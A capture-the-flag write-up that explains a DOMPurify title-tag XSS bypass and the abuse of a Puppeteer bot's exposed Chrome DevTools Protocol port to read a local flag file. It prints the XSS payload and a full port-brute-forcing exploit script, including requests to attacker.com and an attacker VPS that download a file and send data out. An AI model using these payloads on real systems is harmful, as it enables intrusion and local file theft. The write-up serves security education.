This CTF challenge required exploiting a web application to extract a `flag.txt` file. The solution involved navigating through XSS vulnerability exploitation, manipulating a Puppeteer instance running with decreased security settings, and leveraging the Chrome DevTools Protocol to circumvent the same-origin policy for the flag's exfiltration. ## Challenge Description The web application was built on Node.js using Express.js and featured an API endpoint that allowed for server-side browsing of user-supplied URLs. The server sanitized inputs with DOMPurify and handled different routes for serving content. The `bot.js` script utilized Puppeteer with flags that reduced security, posing an opportunity for exploitation. ### **App.js Analysis** The **`app.js`** file serves as the backbone of the web application, handling HTTP requests, routing, and rendering views. The analysis of this file revealed several points of interest: 1. **DOM Sanitization with DOMPurify**: The application uses the DOMPurify library to sanitize user input before it is used within the application's views. Specifically, the **`getTitle`** function is designed to clean up the path parameter from the URL and use it as the page title. The relevant code snippet is: ```jsx const getTitle = (path) => { path = decodeURIComponent(path).split("/"); path = path.slice(-1).toString(); return DOMPurify.sanitize(path); } ``` While DOMPurify is a robust tool for preventing XSS by removing dangerous HTML and JavaScript, its effectiveness depends on the context in which it is used. In this case, it did not account for the browser's behavior in processing the **`<title>`** tag, leading to a context-dependent sanitization bypass. 2. **Routing and Static File Serving**: The application utilizes Express.js for routing and serving static files. The static file serving is configured with: ```jsx app.use("/static", express.static(path.join(__dirname, "static"))); ``` This is a common pattern in Express.js applications and typically does not present a security issue unless there are unprotected sensitive files within the static directory. 3. **Error Handling**: The application provides custom error handling for 404 (Not Found) errors, which uses the **`getTitle`** function to sanitize the path: ```jsx app.use((req, res) => { res.status(404); res.render("404", { title: getTitle(req.path) }); }) ``` The custom error handling demonstrates a good practice of providing user-friendly error messages but also highlights the importance of proper sanitization, as even error pages can be an XSS vector if not handled correctly. ### **Bot.js Analysis** The **`bot.js`** file is used to simulate a user's browser session via Puppeteer, a Node library which provides a high-level API to control Chrome over the DevTools Protocol. The analysis of this file highlighted a concerning configuration: 1. **Security Flags**: The Puppeteer instance was launched with the following security flags disabled: ```jsx const browser = await puppeteer.launch({ headless: "new", ignoreHTTPSErrors: true, args: [ "--no-sandbox", "--ignore-certificate-errors", "--disable-web-security" ], executablePath: "/usr/bin/chromium-browser" }); ``` - **`-no-sandbox`**: Disables the sandbox for all processes. This is a dangerous flag because it allows for unrestricted access to system resources and should never be used in a production environment. - **`-disable-web-security`**: Disables the same-origin policy. This flag compromises the browser's security model, allowing any page to request data from any other domain, leading to potential data theft or other cross-origin attacks. - **`-ignore-certificate-errors`**: Instructs the browser to ignore SSL/TLS certificate errors. This could allow the bot to interact with potentially insecure or malicious websites without any warnings. 2. **Headless Browser Control**: The **`goto`** function within **`bot.js`** is responsible for navigating the Puppeteer-controlled browser to a given URL: ```jsx async function goto(url) { // ... Puppeteer launch code ... const page = await browser.newPage(); try { await page.goto(url); } catch {} // ... Browser closing code ... } ``` This function navigates to the provided URL without any checks or restrictions on the content that could be loaded, which, when combined with the disabled security features, exposes the bot to a range of web-based attacks. ### Dockerfile Analysis The Dockerfile showed that the challenge ran within a Docker container, with a dedicated `challenge` user. This indicated that local files were readable by the server: ``` [...] # Create user adduser -D -u 1000 challenge && \ echo "challenge:$(head -c 32 /dev/urandom | base64)" | chpasswd; [...] COPY ./flag.txt /flag.txt [...] ``` ## Vulnerable Parts ### XSS via `<title>` Tag Manipulation The web application's sanitation mechanism failed to account for browser behavior concerning the `<title>` tag. Typically, when a browser encounters the sequence `</title>` within a `<title>` element, it interprets it as the end of that element. This behavior creates an opportunity for an XSS attack if user input can be manipulated to inject this sequence. The vulnerability was found in the server's response behavior when rendering the title in the header.ejs template, where the user-controlled input was not adequately sanitized to prevent such an attack. ### Insecure Puppeteer Setup The Puppeteer instance, part of the bot.js script, launched a Chromium browser with explicitly disabled security features, namely through the flags `--disable-web-security` and `--no-sandbox`. These settings are highly insecure as they disable the same-origin policy and sandboxing, respectively. The same-origin policy is a critical security mechanism that prevents documents or scripts loaded from one origin from interacting with resources from another origin. Disabling it effectively allows any loaded document to request resources from any origin, which is a dangerous setting in a browser controlled by Puppeteer. The `--no-sandbox` flag also introduces significant vulnerabilities. Sandboxing is a security feature that executes processes in a restricted environment to limit the potential damage from a malicious exploit. By disabling sandboxing, the browser process runs with higher privileges, potentially allowing a malicious script to perform actions on the host system that would otherwise be restricted. ### Chrome DevTools Protocol Access The Chrome DevTools Protocol (CDP) provides extensive control over a Chrome browser instance, including the ability to inspect, debug, and manipulate web pages and their environment in real-time. The challenge's setup did not secure the CDP adequately, as it was possible to brute-force the debugging port. The CDP was accessible because the Puppeteer instance ran with a known or predictable debugging port, which could be accessed without proper authentication or origin checks. In a secure configuration, WebSocket connections to the CDP should only be allowed from trusted origins, and the debugging port should not be exposed unnecessarily. However, in this challenge, neither of these precautions was taken, leaving the CDP wide open for exploitation. This oversight allowed the execution of arbitrary commands in the browser context, which could be used to bypass security restrictions and access local resources. ## Solution ### Step 1: Crafting the XSS Payload The XSS exploitation was pivotal to manipulating the `<title>` tag in a way that would bypass DOMPurify. The server's DOMPurify configuration intended to sanitize the inputs to prevent XSS, but it didn't account for the context in which the browser would process the title tag. Browsers inherently close the `<title>` tag when they encounter a `</title>` sequence, which could be exploited. To encode the forward slash into an HTML entity, the payload was designed to bypass the server's decode and split logic, thus preserving the attack vector: ```jsx path = decodeURIComponent(path).split("/"); path = path.slice(-1).toString(); ``` By encoding the forward slash as `&sol;`, the payload would be interpreted as harmless by DOMPurify but would break out of the title tag when rendered by the browser: ```html <a href="<&sol;title><img src onerror=XSS>"> ``` This would lead to the browser closing the title tag prematurely and treating `<img src onerror=XSS>` as executable HTML, leading to XSS when the bot visited the page. ```javascript <title><a href=" </title> <img src onerror=XSS> ``` The script to be executed by the browser was encoded in Base64 to avoid special character issues and was decoded and executed by the browser's JavaScript engine upon rendering the XSS payload: ```jsx const base64Payload = btoa("...JavaScript code..."); const xssVector = `http://localhost:3000/api/report?url=<a href='<&sol;title><img src onerror=eval(atob("${base64Payload}"))>'>`; ``` ### Step 2: Initial Chrome DevTools Protocol Attempt With the second hint about the Chrome DevTools Protocol, it was leveraged for deep interaction with the Chrome browser. The initial approach involved: 1. **Setting Up a Known CDP Port**: Configuring the headless Chrome browser to start with the `-remote-debugging-port=9222` flag. 2. **Accessing the /json Endpoint**: Making an HTTP request to `http://localhost:9222/json`. 3. **WebSocket Connection Attempt**: Attempting to connect to the WebSocket but facing a `403 Forbidden` error: ``` [ERROR] Rejected an incoming WebSocket connection from the origin. ``` This error was traced back to a security control implemented in the **`devtools_http_handler.cc`** file within Chromium's source code. An update made in December 2022 added a check for the **`Origin`** header in WebSocket requests. If the was not included in the **`--remote-allow-origins`** flag during the browser's launch, the connection would be rejected. Here's a snippet from the source code indicating the security check ```cpp void DevToolsHttpHandler::OnWebSocketRequest( int connection_id, const net::HttpServerRequestInfo& request) { if (!thread_) return; if (request.headers.count("origin") && !remote_allow_origins_.count(request.headers.at("origin")) && !remote_allow_origins_.count("*")) { const std::string& origin = request.headers.at("origin"); const std::string message = base::StringPrintf( "Rejected an incoming WebSocket connection from the %s origin. " "Use the command line flag --remote-allow-origins=%s to allow " "connections from this origin or --remote-allow-origins=* to allow all " "origins.", origin.c_str(), origin.c_str()); Send403(connection_id, message); LOG(ERROR) << message; return; } ``` #### Adjusting Strategy After WebSocket Failure: With the WebSocket approach blocked, focus shifted to alternative methods of interacting with the CDP. ### **Step 3: Utilizing the `/json/new` Endpoint** With the direct WebSocket connection proving unfeasible due to security restrictions, a different tactic was required. The solution came with the realization that the Chrome DevTools Protocol (CDP) provided a **`/json/new`** endpoint which could be used to open a new browser tab with a specified URL using a PUT request. #### Opening a Local File in a New Tab: To exploit this, a PUT request was sent to the **`/json/new`** endpoint with the file URL of the malicious HTML file. This operation would instruct the headless browser to open a new tab and load the file from the local filesystem: ```jsx fetch('http://localhost:9222/json/new?file:///path/to/the/malicious.html',{method: 'PUT'}) ``` #### Bypassing the Same-Origin Policy: This step was critical as it allowed for the execution of JavaScript in a context where the same-origin policy did not apply. Consequently, this permitted the malicious script to perform actions that would have been restricted if executed within the context of a web page served over HTTP or HTTPS. #### Impact: By leveraging the **`/json/new`** endpoint in this way, it was possible to sidestep the limitations encountered with the WebSocket connection attempt and proceed with the attack. This endpoint became the new vector for triggering the malicious file execution necessary to complete the challenge. ### Step 4: Downloading and Executing the Malicious HTML File An HTML file was crafted to perform a `fetch` request for `file:///flag.txt` when executed. The bot was induced to download this file by sending it with a `Content-Disposition: attachment` header. Blocking synchronous `XMLHttpRequests` were made to hang the execution: ```jsx var link = document.createElement('a'); link.href = 'http://attacker.com/malicious.html'; link.download = 'malicious.html'; link.click(); // Synchronous requests to delay the browser closing var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/?delay', false); xhr.send(); ``` ### Step 5: Executing the Attack Once the file was in the browser's download directory, it was triggered through the Chrome DevTools Protocol. The final script combined brute-forcing the debugging port, downloading the malicious file, and executing the payload that fetched the flag: ```jsx const totalPorts = 66000 - 30000; const batches= 5; const portsPerSecond = totalPorts / batches; async function checkPort(port) { return fetch(`http://localhost:${port}/json/protocol`, { method: 'GET' }) .then(response => response.ok ? port : Promise.reject(port)) .catch(() => null); } async function bruteforcePorts(start, end) { const results = []; for (let i = start; i <= end; i += portsPerSecond) { const batch = []; for (let port = i; port < i + portsPerSecond && port <= end; port++) { batch.push(checkPort(port)); } const batchResults = await Promise.all(batch); results.push(...batchResults.filter(port => port !== null)); if (results.length > 0) { break; } } return results; } async function downloadFileAndBlock(port) { var link = document.createElement('a'); link.href = 'http://VPS/get?file=index.html'; link.download = 'index.html'; link.click(); var xhr1 = new XMLHttpRequest(); xhr1.open('GET', 'http://VPS/?delay=1', false); xhr1.send(); var xhr2 = new XMLHttpRequest(); xhr2.open('GET', 'http://VPS/?delay=2', false); xhr2.send(); // Use the discovered port from the bruteforce_port function fetch(`http://localhost:${port}/json/new?file:///home/challenge/Downloads/index.html`, { method: 'PUT' }); var xhr3 = new XMLHttpRequest(); xhr3.open('GET', 'http://VPS/?delay=3', false); xhr3.send(); } (async () => { const openPorts = await bruteforcePorts(30000, 66000); var xhr4 = new XMLHttpRequest(); xhr4.open('GET', 'http://VPS/?delay=17', false); xhr4.send(); if (openPorts.length > 0) { console.log('Open Ports:', JSON.stringify(openPorts[0])); var xhr5 = new XMLHttpRequest(); xhr5.open('GET', 'http://VPS/getflag?='+JSON.stringify(openPorts), false); xhr5.send(); downloadFileAndBlock(openPorts[0]); } else { console.log('none'); } })(); ``` The final payload was encoded in Base64 and delivered via the crafted XSS vector through the `/api/report` endpoint, which initiated the download and execution of the malicious file, culminating in the flag's exfiltration.